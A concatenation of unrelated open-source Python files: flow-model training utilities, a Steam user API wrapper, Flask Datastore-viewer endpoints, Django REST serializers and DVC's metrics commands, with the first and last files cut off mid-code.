num_dists = len(dists)
avg_dist = np.sum(dists, axis=0) / num_dists
return np.sum([sps.entropy(dist, avg_dist) for dist in dists]) / num_dists
self._data["jsd"] = {"sampled.training": jsd([sampled_nlls, training_nlls])}
self._data["jsd_joined"] = jsd([sampled_nlls, training_nlls])
def _amplify_dataset(self, training_nlls: np.array, target_size: int):
training_set_length = len(training_nlls)
if training_set_length < target_size:
delta = target_size - training_set_length
padding = []
counter = 0
for i in range(delta):
padding.append(training_nlls[counter])
if training_set_length == (counter + 1):
counter = 0
else:
counter += 1
training_nlls = np.concatenate([training_nlls, padding])
return training_nlls
def log_out_inputs(self):
self._logger.log_out_input_configuration()
|
the-stack_106_15876
|
"""
The MIT License (MIT)
Copyright (c) 2020 James
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import annotations
import asyncio
from collections.abc import Coroutine
from datetime import timedelta
from typing import TYPE_CHECKING, Any
from .abc import BaseUser, Messageable, UserDict
from .enums import TradeOfferState
from .errors import ClientException, ConfirmationError
from .models import URL
from .profile import OwnedProfileItems, ProfileItem
if TYPE_CHECKING:
from .clan import Clan
from .game import Game
from .group import Group
from .image import Image
from .message import UserMessage
from .state import ConnectionState
from .trade import Inventory, TradeOffer
__all__ = (
"User",
"ClientUser",
)
class User(BaseUser, Messageable["UserMessage"]):
"""Represents a Steam user's account.
.. container:: operations
.. describe:: x == y
Checks if two users are equal.
.. describe:: str(x)
Returns the user's name.
Attributes
----------
name
The user's username.
state
The current persona state of the account (e.g. LookingToTrade).
game
The Game instance attached to the user. Is ``None`` if the user isn't in a game or one that is recognised by the
api.
avatar_url
The avatar url of the user. Uses the large (184x184 px) image url.
real_name
The user's real name defined by them. Could be ``None``.
primary_clan
The user's primary clan.
created_at
The time at which the user's account was created. Could be ``None``.
last_logon
The last time the user logged into steam. This is only ``None`` if user hasn't been updated from the websocket.
last_logoff
The last time the user logged off from steam. Could be ``None`` (e.g. if they are currently online).
last_seen_online
The last time the user could be seen online. This is only ``None`` if user hasn't been updated from the
websocket.
country
The country code of the account. Could be ``None``.
flags
The persona state flags of the account.
"""
__slots__ = ()
async def add(self) -> None:
"""Sends a friend invite to the user to your friends list."""
await self._state.http.add_user(self.id64)
async def remove(self) -> None:
"""Remove the user from your friends list."""
await self._state.http.remove_user(self.id64)
try:
self._state.client.user.friends.remove(self)
except ValueError:
pass
async def cancel_invite(self) -> None:
"""Cancels an invite sent to the user. This effectively does the same thing as :meth:`remove`."""
await self._state.http.remove_user(self.id64)
async def block(self) -> None:
"""Blocks the user."""
await self._state.http.block_user(self.id64)
async def unblock(self) -> None:
"""Unblocks the user."""
await self._state.http.unblock_user(self.id64)
async def escrow(self, token: str | None = None) -> timedelta | None:
"""Check how long any received items would take to arrive. ``None`` if the user has no escrow or has a
private inventory.
Parameters
----------
token
The user's trade offer token, not required if you are friends with the user.
"""
resp = await self._state.http.get_user_escrow(self.id64, token)
their_escrow = resp["response"].get("their_escrow")
if their_escrow is None: # private
return None
seconds = their_escrow["escrow_end_duration_seconds"]
return timedelta(seconds=seconds) if seconds else None
def _message_func(self, content: str) -> Coroutine[Any, Any, UserMessage]:
return self._state.send_user_message(self.id64, content)
def _image_func(self, image: Image) -> Coroutine[Any, Any, None]:
return self._state.http.send_user_image(self.id64, image)
async def send(
self,
content: Any = None,
*,
trade: TradeOffer | None = None,
image: Image | None = None,
) -> UserMessage | None:
"""Send a message, trade or image to an :class:`User`.
Parameters
----------
content
The message to send to the user.
trade
The trade offer to send to the user.
Note
----
This will have its :attr:`~steam.TradeOffer.id` attribute updated after being sent.
image
The image to send to the user.
Raises
------
:exc:`~steam.HTTPException`
Sending the message failed.
:exc:`~steam.Forbidden`
You do not have permission to send the message.
Returns
-------
The sent message only applicable if ``content`` is passed.
"""
message = await super().send(content, image)
if trade is not None:
to_send = [item.to_dict() for item in trade.items_to_send]
to_receive = [item.to_dict() for item in trade.items_to_receive]
resp = await self._state.http.send_trade_offer(self, to_send, to_receive, trade.token, trade.message or "")
trade._has_been_sent = True
needs_confirmation = resp.get("needs_mobile_confirmation", False)
trade._update_from_send(self._state, resp, self, active=not needs_confirmation)
if needs_confirmation:
for tries in range(5):
try:
await trade.confirm()
except ConfirmationError:
break
except ClientException:
await asyncio.sleep(tries * 2)
trade.state = TradeOfferState.Active
# make sure the trade is updated before this function returns
self._state._trades[trade.id] = trade
self._state._trades_to_watch.add(trade.id)
await self._state.wait_for_trade(trade.id)
self._state.dispatch("trade_send", trade)
return message
async def invite_to_group(self, group: Group) -> None:
"""Invites the user to a :class:`Group`.
Parameters
-----------
group
The group to invite the user to.
"""
await self._state.invite_user_to_group(self.id64, group.id)
async def invite_to_clan(self, clan: Clan) -> None:
"""Invites the user to a :class:`Clan`.
Parameters
-----------
clan
The clan to invite the user to.
"""
await self._state.http.invite_user_to_clan(self.id64, clan.id64)
async def owns(self, game: Game) -> bool:
"""Whether or not the game is owned by this user.
Parameters
----------
game
The game you want to check the ownership of.
"""
return self.id64 in await self._state.fetch_friends_who_own(game.id)
def is_friend(self) -> bool:
"""Whether or not the user is in the :class:`ClientUser`'s friends."""
return self in self._state.client.user.friends
class ClientUser(BaseUser):
"""Represents your account.
.. container:: operations
.. describe:: x == y
Checks if two users are equal.
.. describe:: str(x)
Returns the user's name.
Attributes
----------
name
The user's username.
friends
A list of the :class:`ClientUser`'s friends.
state
The current persona state of the account (e.g. LookingToTrade).
game
The Game instance attached to the user. Is ``None`` if the user isn't in a game or one that is recognised by
the api.
avatar_url
The avatar url of the user. Uses the large (184x184 px) image url.
real_name
The user's real name defined by them. Could be ``None``.
primary_clan
The user's primary clan. Could be ``None``
created_at
The time at which the user's account was created. Could be ``None``.
last_logon
The last time the user logged into steam. This is only ``None`` if user hasn't been updated from the websocket.
last_logoff
The last time the user logged off from steam. Could be ``None`` (e.g. if they are currently online).
last_seen_online
The last time the user could be seen online. This is only ``None`` if user hasn't been updated from the
websocket.
country
The country code of the account. Could be ``None``.
flags
The persona state flags of the account.
"""
# TODO more stuff to add https://github.com/DoctorMcKay/node-steamcommunity/blob/master/components/profile.js
__slots__ = ("friends", "_inventory_func")
def __init__(self, state: ConnectionState, data: UserDict):
super().__init__(state, data)
self.friends: list[User] = []
self._inventory_func = BaseUser.inventory
async def inventory(self, game: Game) -> Inventory:
return await self._inventory_func(self, game)
async def setup_profile(self) -> None:
"""Set up your profile if possible."""
if self.has_setup_profile():
return
params = {"welcomed": 1}
await self._state.http.get(URL.COMMUNITY / "my/edit", params=params)
async def clear_nicks(self) -> None:
"""Clears the client user's nickname/alias history."""
await self._state.http.clear_nickname_history()
async def profile_items(self) -> OwnedProfileItems:
"""Fetch all of the client user's profile items."""
items = await self._state.fetch_profile_items()
return OwnedProfileItems(
backgrounds=[
ProfileItem(self._state, background, um_name="ProfileBackground")
for background in items.profile_backgrounds
],
mini_profile_backgrounds=[
ProfileItem(self._state, mini_profile_background, um_name="MiniProfileBackground")
for mini_profile_background in items.mini_profile_backgrounds
],
avatar_frames=[
ProfileItem(self._state, avatar_frame, um_name="AvatarFrame") for avatar_frame in items.avatar_frames
],
animated_avatars=[
ProfileItem(self._state, animated_avatar, um_name="AnimatedAvatar")
for animated_avatar in items.animated_avatars
],
modifiers=[ProfileItem(self._state, modifier) for modifier in items.profile_modifiers],
)
async def edit(
self,
*,
name: str | None = None,
real_name: str | None = None,
url: str | None = None,
summary: str | None = None,
country: str | None = None,
state: str | None = None,
city: str | None = None,
avatar: Image | None = None,
) -> None:
"""Edit the client user's profile. Any values that aren't set will use their defaults.
Parameters
----------
name
The new name you wish to go by.
real_name
The real name you wish to go by.
url
The custom url ending/path you wish to use.
summary
The summary/description you wish to use.
country
The country you want to be from.
state
The state you want to be from.
city
The city you want to be from.
avatar
The avatar you wish to use.
Note
----
This needs to be at least 184px x 184px.
Raises
-------
:exc:`~steam.HTTPException`
Editing your profile failed.
"""
await self._state.http.edit_profile(name, real_name, url, summary, country, state, city, avatar)
|
the-stack_106_15877
|
import base64
import datetime
import json
import os
import uuid
from collections import defaultdict
import flask.views
from datastore_viewer.infrastructure import DatastoreViewerRepository
from datastore_viewer.infrastructure import get_client
from datastore_viewer.presentation.ui.api.encoder import DataStoreEntityJSONEncoder
class EntityView(flask.views.MethodView):
def get(self, project_name: str):
namespace = flask.request.args.get('namespace')
repository = DatastoreViewerRepository(
project_name=project_name,
namespace=namespace,
)
serialized_key = flask.request.args.get('key')
key_path = json.loads(base64.b64decode(serialized_key))
key = repository.build_key_by_flat_path(key_path=key_path)
entity = repository.fetch_entity(key=key)
return flask.jsonify({
'project_name': project_name,
            'key': str(key),
'entity': str(entity)
})
class ProjectAPIView(flask.views.MethodView):
def get(self, project_name: str, kind: str):
per_page = int(flask.request.args.get('perPage', '25'))
page_number = int(flask.request.args.get('page', '1'))
order = flask.request.args.get('order', '')
encoder = DataStoreEntityJSONEncoder()
repository = DatastoreViewerRepository(project_name=project_name)
properties_by_kind = repository.fetch_parent_properties()
current_kind = kind
current_kind_properties = properties_by_kind.get(current_kind, [])
entities, total_count = repository.fetch_entities(
kind=current_kind,
per_page=per_page,
page_number=page_number,
orderBy=order,
)
entities_array = []
for entity in entities:
entities_array.append(
encoder.encode(
entity=entity,
property_names=current_kind_properties
)
)
entities_json = defaultdict(list)
entities_json['entityResults'] = entities_array
property_names = set()
for entity in entities:
property_names.update(entity.keys())
property_names = sorted(property_names)
entity_properties = []
for name in property_names:
entity_properties.append({
"name": name,
"index": name in current_kind_properties,
})
return flask.jsonify({
'entityResults': entities_array,
'pageNumber': page_number,
'perPage': per_page,
'totalCount': total_count,
'properties': entity_properties,
})
def delete(self, project_name: str, kind: str):
data = flask.request.get_json()
repository = DatastoreViewerRepository(project_name=project_name)
keys = []
for key in data["url_safe_key"]:
key_path = json.loads(base64.b64decode(key))
keys.append(repository.build_key_by_flat_path(key_path=key_path))
repository.delete_multi(keys=keys)
return flask.jsonify({
'deleteResults': data["url_safe_key"]
})
class EntityAPIView(flask.views.MethodView):
def get(self, project_name: str, kind: str, url_safe_key: str):
encoder = DataStoreEntityJSONEncoder()
repository = DatastoreViewerRepository(project_name=project_name)
key_path = json.loads(base64.b64decode(url_safe_key))
key = repository.build_key_by_flat_path(key_path=key_path)
entity = repository.fetch_entity(key=key)
properties_by_kind = repository.fetch_parent_properties()
current_kind = kind
current_kind_properties = properties_by_kind.get(current_kind, [])
return flask.jsonify({
"entityResult":
encoder.encode(
entity=entity,
property_names=current_kind_properties
)
})
def delete(self, project_name: str, kind: str, url_safe_key: str):
encoder = DataStoreEntityJSONEncoder()
repository = DatastoreViewerRepository(project_name=project_name)
key_path = json.loads(base64.b64decode(url_safe_key))
key = repository.build_key_by_flat_path(key_path=key_path)
repository.delete(key=key)
return flask.jsonify({
"deleteResult": f'{url_safe_key}'
})
class KindAPIView(flask.views.MethodView):
def get(self, project_name: str):
repository = DatastoreViewerRepository(project_name=project_name)
properties_by_kind = repository.fetch_parent_properties()
kinds_json = defaultdict(list)
kinds_json['kindResults'] = []
for kind in properties_by_kind:
kind_properties = properties_by_kind.get(kind, [])
kind_dict = {
"kind": kind,
"indexed_properties": list(map(lambda x: {"property_name": x}, kind_properties))}
kinds_json['kindResults'].append(kind_dict)
return flask.jsonify(kinds_json)
class ProjectListAPIView(flask.views.MethodView):
def get(self):
return flask.jsonify({
"projectResult": {
"project_name": os.environ.get('GOOGLE_CLOUD_PROJECT', '')
}
})
class SampleDataAPIView(flask.views.MethodView):
@staticmethod
def _serialized_doc(doc) -> str:
doc_ = {}
for k, v in doc.items():
doc_[k] = repr(v)
return json.dumps(doc_, ensure_ascii=True, indent=4)
def post(self):
from google.cloud import datastore
client = get_client(project_name=os.environ.get('GOOGLE_CLOUD_PROJECT', ''))
user1 = datastore.Entity(key=client.key("User"))
user1.update({
"name": "User Name",
"float": 3.141592,
"int": 42,
"false": False,
"true": True,
"null": None,
"datetime": datetime.datetime.utcnow(),
})
user1["serialized"] = self._serialized_doc(user1)
client.put(user1)
user2 = datastore.Entity(key=client.key("User", str(uuid.uuid4())))
user2.update({
"full_name": "User Full Name",
"birthday": datetime.datetime.utcnow(),
})
user2["serialized"] = self._serialized_doc(user2)
client.put(user2)
profile1 = datastore.Entity(key=client.key("Profile"), exclude_from_indexes=("description",))
profile1.update({
"user_key": user2.key,
"description": "this is description text"
})
profile1["serialized"] = self._serialized_doc(profile1)
client.put(profile1)
bulk_objects = []
for i in range(100):
bulk = datastore.Entity(key=client.key("Bulk", str(uuid.uuid4())))
bulk.update({
"value": str(uuid.uuid4()),
"timestamp": datetime.datetime.utcnow(),
})
bulk["serialized"] = self._serialized_doc(bulk)
bulk_objects.append(bulk)
client.put_multi(bulk_objects)
setting = datastore.Entity(key=client.key("Setting", str(uuid.uuid4())), exclude_from_indexes=("value",))
setting.update({"value": "this is excluded from indexes"})
client.put(setting)
embedded = datastore.Entity(key=client.key("Embedded", str(uuid.uuid4())))
embedded.update({
"embedded_property": {
"name": "NAME",
"integer": 42,
"float": 3.141592,
"datetime": datetime.datetime.utcnow(),
}
})
embedded["serialized"] = self._serialized_doc(embedded)
client.put(embedded)
array = datastore.Entity(key=client.key("SampleArray", str(uuid.uuid4())))
array.update({
"string_array": ["this", "is", "a", "pen"],
"integer_array": [1, 2, 3, 5, 7, 11],
"float_array": [1.41421, 2.2362],
})
embedded["serialized"] = self._serialized_doc(array)
client.put(array)
new_kind = datastore.Entity(key=client.key(f"z{datetime.datetime.utcnow().strftime('%Y%m%d-%H%M%S')}"))
new_kind.update({"value": datetime.datetime.utcnow()})
client.put(new_kind)
return flask.jsonify({"ok": True})
|
the-stack_106_15878
|
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission
from django.db import transaction
from rest_framework import serializers
from .models import *
from Users.serializers import UserSerializer
from core.views import get_userData
class OrganizationSerializer(serializers.ModelSerializer):
creator = UserSerializer()
class Meta:
model = Organization
        fields = ['id', 'name', 'description', 'address', 'creator',
                  'numbers', 'links', 'logo', 'created_at', 'updated_at']
class OrganizationCSerializer(serializers.ModelSerializer):
@transaction.atomic
def create(self, validated_data):
creator = get_user_model().objects.get(
id=get_userData(self.context['request'])['user_id'])
validated_data['creator'] = creator
organization = Organization.objects.create(**validated_data)
Organization_member.objects.create(
user=organization.creator,
organization=organization,
surname=organization.creator.surname,
first_name=organization.creator.first_name,
second_name=organization.creator.second_name,
email=organization.creator.email,
address=organization.creator.address,
phone=organization.creator.phone,
avatar=organization.creator.avatar
)
return organization
class Meta:
model = Organization
fields = ['name', 'description',
'address', 'links', 'numbers', 'logo']
class OrganizationUSerializer(serializers.ModelSerializer):
class Meta:
model = Organization
fields = ['name', 'description',
'address', 'links', 'numbers', 'logo']
class OrganizationMarketplaceSerializer(serializers.ModelSerializer):
id = serializers.IntegerField()
name = serializers.CharField(allow_null=True)
address = serializers.CharField(allow_null=True)
logo = serializers.CharField(allow_null=True)
class Meta:
model = Organization
fields = ['id', 'name', 'address', 'numbers', 'links', 'logo']
class Organization_memberSerializer(serializers.ModelSerializer):
user = UserSerializer()
organization = OrganizationSerializer()
class Meta:
model = Organization_member
fields = ['id', 'user', 'first_name', 'surname', 'second_name',
'address', 'phone', 'email', 'avatar', 'pass_series', 'pass_number', 'organization', 'created_at', 'updated_at']
class Organization_memberCSerializer(serializers.ModelSerializer):
def create(self, validated_data):
user_data = {
"first_name": validated_data['user'].first_name,
"surname": validated_data['user'].surname,
"second_name": validated_data['user'].second_name,
"phone": validated_data['user'].phone,
"email": validated_data['user'].email,
"address": validated_data['user'].address,
"avatar": validated_data['user'].avatar
}
organization_member = Organization_member.objects.create(
**validated_data, **user_data)
return organization_member
class Meta:
model = Organization_member
fields = ['user', 'organization']
class Organization_memberUSerializer(serializers.ModelSerializer):
user = UserSerializer(read_only = True)
class Meta:
model = Organization_member
fields = ['user', 'first_name', 'surname', 'second_name', 'address',
'phone', 'email', 'avatar', 'pass_series', 'pass_number']
class Organization_memberMarketplaceSerializer(serializers.ModelSerializer):
id = serializers.IntegerField()
surname = serializers.CharField(allow_null=True)
first_name = serializers.CharField(allow_null=True)
second_name = serializers.CharField(allow_null=True)
address = serializers.CharField(allow_null=True)
phone = serializers.CharField(allow_null=True)
email = serializers.CharField(allow_null=True)
avatar = serializers.CharField(allow_null=True)
pass_series = serializers.CharField(allow_null=True)
pass_number = serializers.CharField(allow_null=True)
class Meta:
model = Organization_member
fields = ['id', 'first_name', 'surname', 'second_name', 'address',
'phone', 'email', 'avatar', 'pass_series', 'pass_number']
class ServiceSerializer(serializers.ModelSerializer):
organization = OrganizationSerializer()
class Meta:
model = Service
fields = ['id', 'name', 'address', 'phone',
'organization', 'created_at', 'updated_at']
class ServiceCSerializer(serializers.ModelSerializer):
@transaction.atomic
def create(self, validated_data):
service = Service.objects.create(**validated_data)
members = Organization.objects.get(id = validated_data.get('organization').id).organization_members.all()
for m in members:
m.user.services = list(set(m.user.services + [service.id]))
m.user.save()
return service
class Meta:
model = Service
fields = ['name', 'address', 'phone', 'organization']
class ServiceUSerializer(serializers.ModelSerializer):
class Meta:
model = Service
fields = ['name', 'address', 'phone']
class ServiceMarketplaceSerializer(serializers.ModelSerializer):
id = serializers.IntegerField()
name = serializers.CharField(allow_null=True)
address = serializers.CharField(allow_null=True)
phone = serializers.CharField(allow_null = True)
class Meta:
model = Service
fields = ['id', 'name', 'address', 'phone']
class MProviderSerializer(serializers.ModelSerializer):
organization = OrganizationSerializer()
service = ServiceSerializer()
class MProviderCSerializer(serializers.ModelSerializer):
token = serializers.CharField(max_length=300, read_only=True)
def create(self, validated_data):
mprovider = MProvider.objects.create(**validated_data)
validated_data['token'] = mprovider.generate_token
return validated_data
class Meta:
model = MProvider
fields = ['token', 'site', 'service', 'organization']
class Meta:
model = MProvider
fields = ['id', 'site', 'service',
'organization', 'created_at', 'updated_at']
class PermissionSerializer(serializers.ModelSerializer):
class Meta:
model = Permission
fields = ['id', 'name', 'content_type', 'codename']
class MyGroupSerializer(serializers.ModelSerializer):
organization = OrganizationSerializer()
service = ServiceSerializer()
permissions = PermissionSerializer(many = True)
class Meta:
model = MyGroup
fields = ['id', 'name', 'permissions',
'organization', 'service']
class MyGroupCSerializer(serializers.ModelSerializer):
def create(self, validated_data):
mygroup = MyGroup.objects.create(**validated_data)
return mygroup
class Meta:
model = MyGroup
fields = ['id', 'name', 'permissions',
'organization', 'service']
class MyGroupUSerializer(serializers.ModelSerializer):
class Meta:
model = MyGroup
fields = ['id', 'name', 'permissions',
'organization', 'service']
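# Hedged usage sketch (not part of this module): creating an organization through
# OrganizationCSerializer from inside a DRF view. The `request` object is assumed
# to carry the token that core.views.get_userData decodes.
#
#     serializer = OrganizationCSerializer(
#         data=request.data, context={"request": request}
#     )
#     serializer.is_valid(raise_exception=True)
#     organization = serializer.save()  # also creates the creator's Organization_member row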
|
the-stack_106_15879
|
import argparse
import logging
from dvc.command.base import append_doc_link
from dvc.command.base import CmdBase
from dvc.command.base import fix_subparsers
from dvc.exceptions import BadMetricError
from dvc.exceptions import DvcException
logger = logging.getLogger(__name__)
def show_metrics(metrics, all_branches=False, all_tags=False):
"""
Args:
metrics (list): Where each element is either a `list`
if an xpath was specified, otherwise a `str`
"""
# When `metrics` contains a `None` key, it means that some files
# specified as `targets` in `repo.metrics.show` didn't contain any metrics.
missing = metrics.pop(None, None)
for branch, val in metrics.items():
if all_branches or all_tags:
logger.info("{branch}:".format(branch=branch))
for fname, metric in val.items():
if isinstance(metric, dict):
lines = list(metric.values())
elif isinstance(metric, list):
lines = metric
else:
lines = metric.splitlines()
if len(lines) > 1:
logger.info("\t{fname}:".format(fname=fname))
for line in lines:
logger.info("\t\t{content}".format(content=line))
else:
logger.info("\t{}: {}".format(fname, metric))
if missing:
raise BadMetricError(missing)
class CmdMetricsShow(CmdBase):
def run(self):
try:
metrics = self.repo.metrics.show(
self.args.targets,
typ=self.args.type,
xpath=self.args.xpath,
all_branches=self.args.all_branches,
all_tags=self.args.all_tags,
recursive=self.args.recursive,
)
show_metrics(metrics, self.args.all_branches, self.args.all_tags)
except DvcException:
logger.exception("failed to show metrics")
return 1
return 0
class CmdMetricsModify(CmdBase):
def run(self):
try:
self.repo.metrics.modify(
self.args.path, typ=self.args.type, xpath=self.args.xpath
)
except DvcException:
logger.exception("failed to modify metric file settings")
return 1
return 0
class CmdMetricsAdd(CmdBase):
def run(self):
try:
self.repo.metrics.add(
self.args.path, self.args.type, self.args.xpath
)
except DvcException:
msg = "failed to add metric file '{}'".format(self.args.path)
logger.exception(msg)
return 1
return 0
class CmdMetricsRemove(CmdBase):
def run(self):
try:
self.repo.metrics.remove(self.args.path)
except DvcException:
msg = "failed to remove metric file '{}'".format(self.args.path)
logger.exception(msg)
return 1
return 0
def _show_diff(diff):
from texttable import Texttable
if not diff:
return "No changes."
table = Texttable()
# remove borders to make it easier for users to copy stuff
table.set_chars(("", "", "", ""))
table.set_deco(0)
rows = [["Path", "Metric", "Value", "Change"]]
for fname, mdiff in diff.items():
for metric, change in mdiff.items():
rows.append(
[
fname,
metric,
change["new"],
change.get("diff", "diff not supported"),
]
)
table.add_rows(rows)
return table.draw()
class CmdMetricsDiff(CmdBase):
def run(self):
try:
diff = self.repo.metrics.diff(
a_rev=self.args.a_rev,
b_rev=self.args.b_rev,
targets=self.args.targets,
typ=self.args.type,
xpath=self.args.xpath,
recursive=self.args.recursive,
)
if self.args.show_json:
import json
logger.info(json.dumps(diff))
else:
logger.info(_show_diff(diff))
except DvcException:
logger.exception("failed to show metrics diff")
return 1
return 0
def add_parser(subparsers, parent_parser):
METRICS_HELP = "Commands to add, manage, collect, and display metrics."
metrics_parser = subparsers.add_parser(
"metrics",
parents=[parent_parser],
description=append_doc_link(METRICS_HELP, "metrics"),
help=METRICS_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
metrics_subparsers = metrics_parser.add_subparsers(
dest="cmd",
help="Use `dvc metrics CMD --help` to display command-specific help.",
)
fix_subparsers(metrics_subparsers)
METRICS_SHOW_HELP = "Print metrics, with optional formatting."
metrics_show_parser = metrics_subparsers.add_parser(
"show",
parents=[parent_parser],
description=append_doc_link(METRICS_SHOW_HELP, "metrics/show"),
help=METRICS_SHOW_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
metrics_show_parser.add_argument(
"targets",
nargs="*",
help="Metric files or directories (see -R) to show",
)
metrics_show_parser.add_argument(
"-t",
"--type",
help=(
"Type of metrics (json/tsv/htsv/csv/hcsv). "
"It can be detected by the file extension automatically. "
"Unsupported types will be treated as raw."
),
)
metrics_show_parser.add_argument(
"-x", "--xpath", help="json/tsv/htsv/csv/hcsv path."
)
metrics_show_parser.add_argument(
"-a",
"--all-branches",
action="store_true",
default=False,
help="Show metrics for all branches.",
)
metrics_show_parser.add_argument(
"-T",
"--all-tags",
action="store_true",
default=False,
help="Show metrics for all tags.",
)
metrics_show_parser.add_argument(
"-R",
"--recursive",
action="store_true",
default=False,
help=(
"If any target is a directory, recursively search and process "
"metric files."
),
)
metrics_show_parser.set_defaults(func=CmdMetricsShow)
METRICS_ADD_HELP = "Mark a DVC-tracked file as a metric."
metrics_add_parser = metrics_subparsers.add_parser(
"add",
parents=[parent_parser],
description=append_doc_link(METRICS_ADD_HELP, "metrics/add"),
help=METRICS_ADD_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
metrics_add_parser.add_argument(
"-t", "--type", help="Type of metrics (raw/json/tsv/htsv/csv/hcsv)."
)
metrics_add_parser.add_argument(
"-x", "--xpath", help="json/tsv/htsv/csv/hcsv path."
)
metrics_add_parser.add_argument("path", help="Path to a metric file.")
metrics_add_parser.set_defaults(func=CmdMetricsAdd)
METRICS_MODIFY_HELP = "Modify metric default formatting."
metrics_modify_parser = metrics_subparsers.add_parser(
"modify",
parents=[parent_parser],
description=append_doc_link(METRICS_MODIFY_HELP, "metrics/modify"),
help=METRICS_MODIFY_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
metrics_modify_parser.add_argument(
"-t", "--type", help="Type of metrics (raw/json/tsv/htsv/csv/hcsv)."
)
metrics_modify_parser.add_argument(
"-x", "--xpath", help="json/tsv/htsv/csv/hcsv path."
)
metrics_modify_parser.add_argument("path", help="Path to a metric file.")
metrics_modify_parser.set_defaults(func=CmdMetricsModify)
METRICS_REMOVE_HELP = "Remove metric mark on a DVC-tracked file."
metrics_remove_parser = metrics_subparsers.add_parser(
"remove",
parents=[parent_parser],
description=append_doc_link(METRICS_REMOVE_HELP, "metrics/remove"),
help=METRICS_REMOVE_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
metrics_remove_parser.add_argument("path", help="Path to a metric file.")
metrics_remove_parser.set_defaults(func=CmdMetricsRemove)
METRICS_DIFF_HELP = "Show changes in metrics between commits"
" in the DVC repository, or between a commit and the workspace."
metrics_diff_parser = metrics_subparsers.add_parser(
"diff",
parents=[parent_parser],
description=append_doc_link(METRICS_DIFF_HELP, "metrics/diff"),
help=METRICS_DIFF_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
metrics_diff_parser.add_argument(
"a_rev", nargs="?", help="Old Git commit to compare (defaults to HEAD)"
)
metrics_diff_parser.add_argument(
"b_rev",
nargs="?",
help=("New Git commit to compare (defaults to the current workspace)"),
)
metrics_diff_parser.add_argument(
"--targets",
nargs="*",
help=(
"Metric files or directories (see -R) to show diff for. "
"Shows diff for all metric files by default."
),
)
metrics_diff_parser.add_argument(
"-t",
"--type",
help=(
"Type of metrics (json/tsv/htsv/csv/hcsv). "
"It can be detected by the file extension automatically. "
"Unsupported types will be treated as raw."
),
)
metrics_diff_parser.add_argument(
"-x", "--xpath", help="json/tsv/htsv/csv/hcsv path."
)
metrics_diff_parser.add_argument(
"-R",
"--recursive",
action="store_true",
default=False,
help=(
"If any target is a directory, recursively search and process "
"metric files."
),
)
metrics_diff_parser.add_argument(
"--show-json",
action="store_true",
default=False,
help="Show output in JSON format.",
)
metrics_diff_parser.set_defaults(func=CmdMetricsDiff)
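# Hedged sketch of how this module plugs into DVC's CLI: add_parser registers the
# sub-commands and each one dispatches through set_defaults(func=...). The
# scaffolding below is illustrative only; DVC builds the real top-level parser
# elsewhere.
#
#     parser = argparse.ArgumentParser(prog="dvc")
#     subparsers = parser.add_subparsers(dest="cmd")
#     shared = argparse.ArgumentParser(add_help=False)
#     add_parser(subparsers, parent_parser=shared)
#     args = parser.parse_args(["metrics", "diff", "HEAD~1", "--show-json"])
#     # args.func is CmdMetricsDiff; DVC instantiates it with the parsed args
#     # and calls .run().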
|
the-stack_106_15880
|
"""
Num params: 122790952
Run it as: mpiexec -n {num_processes} python3.6 -m flows_celeba.launchers.celeba128_5bit_official from the flows master directory of the git repo.
num_processes=8 was used for this launcher on a 8-GPU (1080 Ti) machine with 40 GB RAM.
If you want to use python3.5, remove the f string in the logdir.
"""
import numpy as np
import tensorflow as tf
from tensorflow.distributions import Normal
from tqdm import tqdm
from flows_imagenet.logistic import mixlogistic_logpdf, mixlogistic_logcdf, mixlogistic_invcdf
from flows_celeba import flow_training_celeba
DEFAULT_FLOATX = tf.float32
STORAGE_FLOATX = tf.float32
def to_default_floatx(x):
return tf.cast(x, DEFAULT_FLOATX)
def at_least_float32(x):
assert x.dtype in [tf.float16, tf.float32, tf.float64]
if x.dtype == tf.float16:
return tf.cast(x, tf.float32)
return x
def get_var(var_name, *, ema, initializer, trainable=True, **kwargs):
"""forced storage dtype"""
assert 'dtype' not in kwargs
if isinstance(initializer, np.ndarray):
initializer = initializer.astype(STORAGE_FLOATX.as_numpy_dtype)
v = tf.get_variable(var_name, dtype=STORAGE_FLOATX, initializer=initializer, trainable=trainable, **kwargs)
if ema is not None:
assert isinstance(ema, tf.train.ExponentialMovingAverage)
v = ema.average(v)
return v
def _norm(x, *, axis, g, b, e=1e-5):
assert x.shape.ndims == g.shape.ndims == b.shape.ndims
u = tf.reduce_mean(x, axis=axis, keepdims=True)
s = tf.reduce_mean(tf.squared_difference(x, u), axis=axis, keepdims=True)
x = (x - u) * tf.rsqrt(s + e)
return x * g + b
def norm(x, *, name, ema):
"""Layer norm over last axis"""
with tf.variable_scope(name):
dim = int(x.shape[-1])
_g = get_var('g', ema=ema, shape=[dim], initializer=tf.constant_initializer(1))
_b = get_var('b', ema=ema, shape=[dim], initializer=tf.constant_initializer(0))
g, b = map(to_default_floatx, [_g, _b])
bcast_shape = [1] * (x.shape.ndims - 1) + [dim]
return _norm(x, g=tf.reshape(g, bcast_shape), b=tf.reshape(b, bcast_shape), axis=-1)
def int_shape(x):
return list(map(int, x.shape.as_list()))
def sumflat(x):
return tf.reduce_sum(tf.reshape(x, [x.shape[0], -1]), axis=1)
def inverse_sigmoid(x):
return -tf.log(tf.reciprocal(x) - 1.)
def init_normalization(x, *, name, init_scale=1., init, ema):
